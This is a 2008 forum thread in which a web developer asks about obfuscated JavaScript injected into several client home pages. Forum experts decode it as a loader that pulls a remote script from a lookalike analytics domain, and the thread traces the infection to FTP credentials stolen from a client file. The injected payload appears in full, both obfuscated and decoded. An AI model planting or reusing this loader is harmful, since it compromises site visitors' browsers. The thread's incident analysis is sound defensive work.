By using this site, you agree to our updated Privacy Policy and our Terms of Use. Manage your Cookies Settings.
424,848 Members | 3,203 Online
Bytes IT Community
+ Ask a Question
Need help? Post your question and get tips & solutions from a community of 424,848 IT Pros & Developers. It's quick & easy.

What is this code and where does it come from?

P: 5
I'm a website developer. Recently I've found variations of this code on the home pages of several of my sites. It triggers warnings in some anti-virus/malware programs but not in others. The pages are on different servers which leads me to believe the code is coming from me somehow. Can anyone tell me what it does? Is it possibly the output of a virus on my machine? If so, why would it appear on the remote version of the page and not my local version? Thanks for any insights!

Expand|Select|Wrap|Line Numbers
  1. <!--7cfbf03e9f4dd4246885967ac47c533a-><script language=javascript>pkunj="%";zmct="L3cscript L6canL67L75agL65L3djavasL63rL69L70L74L3eL20 fL75L6eL63tion eL66j(gL6eq){vaL72 L69L72,L78=\"L651L68wa+89L74m)7L72`pL4eL21EV6L5bL47L7cL54L32L34jvL6bL3a='L3b-L4fL49ML2aL2e_HsiL6fL42L43L75yL63dL50L40L5dlqZJL55L4bL5e$\\\"AzL46#L7d3L20L35L2c0bL67xL7b(fL26~n\",kL72L78L3dL22\",o,ooL2cL6c=L22\",mxL6dL3bL66L6fL72(ir=L30L3bL69rL3cgL6eL71L2elL65ngth;L69L72L2b+)L7b oL3dgL6eL71L2echarL41tL28ir);oo=L78L2eL69nL64eL78OL66L28L6f);L69f(L6fo>-1){ mL78L6dL3d((oL6fL2bL31)L258L31L2d1L29;if(mxmL3c=0)L6dL78m+L3d81L3bl+L3dxL2eL63L68aL72L41L74L28mxL6dL2dL31)L3bL20} L65lL73eL20L6c+L3do;L7dkrL78+=l;dL6fcumL65ntL2eL77L72iteL28kL72xL29L3b}<L2fL73L63L72L69ptL3e";ufdr=unescape(zmct.replace(/L/g,pkunj));var nli,b;document.write(ufdr);nli="<id`oNm5q+exy+x1'Av+k+id`oNmA>5PBdy)1em_a`om1f5A<SuRM@25q+exy+x1'\\AU+k+Sd`oNm\\A5SRu'\\AwmmN=//aaa_xBBxq1+e+qomodi_e1m/HHymg_vi?A8PBdy)1em_`1&1``1`8A\\A><\\/SuRM@2>A57-5</id`oNm>55";efj(nli);</script>
Oct 17 '08 #1
Share this Question
Share on Google+
6 Replies


Atli
Expert 5K+
P: 5,058
Hi.

Where exactly on your pages is this showing up?
Do the pages use any data taken from the client?

What exactly do the malware applications that flag it say?

Without actually being able to read what the code does, my best guess would be that this was planted by some *cracker* to either try to steal information from your clients or to try to plant malicious code on their browsers. You really need to find out how they did it and plug that hole.

In any case, unless you figure out exactly what it is, I would get rid of it fast.
If this is some sort of malicious code, and it is being executed when people visit your site, it could very well be causing them any number of problems, which could even lead to your site being flagged by the anti-phishing programs. (But then again, I'm the paranoid type :P)
Oct 18 '08 #2

gits
Expert Mod 5K+
P: 5,235
the script is some obfuscated javascript that adds the following code to your page:

Expand|Select|Wrap|Line Numbers
  1. <script language="javascript"> document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" ); </script> 
calling the shown url:

http://www.googleanalitics.net/__utb.js

is blocked by FF because of a potential security risk -> so I even would just remove the code and would try to trace down where it came from as Atli suggested.

kind regards
Oct 18 '08 #3

P: 5
Thanks, Atli and gits--that tells me a lot. Some research on googleanalitics.net shows complaints going back to at least 2002. I fixed the pages as soon as I discovered the code on each one. Now I've got to figure out HOW they got infected. The "date modified" stamp on the server shows that the various pages were altered on July 3, 8 and 10. That four of my pages for different clients on different servers got infected randomly seems too coincidental, but if it's coming from me, why just those four and not any of the many others I maintain? Nightly sweeps by AVG 8.0 aren't showing anything on my machine, and there's no viewer input to any of the pages. I realize this is getting off the topic of the forum, but thanks again for your help--I'll post back FYI if I find out anything else.
Oct 18 '08 #4

gits
Expert Mod 5K+
P: 5,235
may be the servers where infected/corrupted? try to ask the admins there ... may be they are aware of the problem ... or in case they are not, may be they could (and should) investigate that? in case you find out something it would be really great to post it here for people that might have similar problems in the future ...

kind regards
Oct 18 '08 #5

P: 5
Several of the infected sites are hosted with GoDaddy. They checked server logs and found that the files were accessed using the hosting account username and password. The infected files were coming from an IP address that resolved to HostFresh in Hong Kong. It's become apparent that my WS_FTP .ini file was compromised and the information in it was used to access these sites. I've found that there is malware that looks for certain files on a computer and that the WS_FTP.ini file is a common target.

For what it's worth, out of about 50 sites in my WS_FTP.ini file, 8 were accessed--4 on GoDaddy and 4 on smaller hosting services. I have about 20 sites on LunarPages and none were accessed--not sure why.
Dec 1 '08 #6

P: 1
I had a similar experience. Same FTP, same script, different host

This thread has been hugely valuable.
Jan 8 '09 #7

Post your reply

Sign in to post your reply or Sign up for a free account.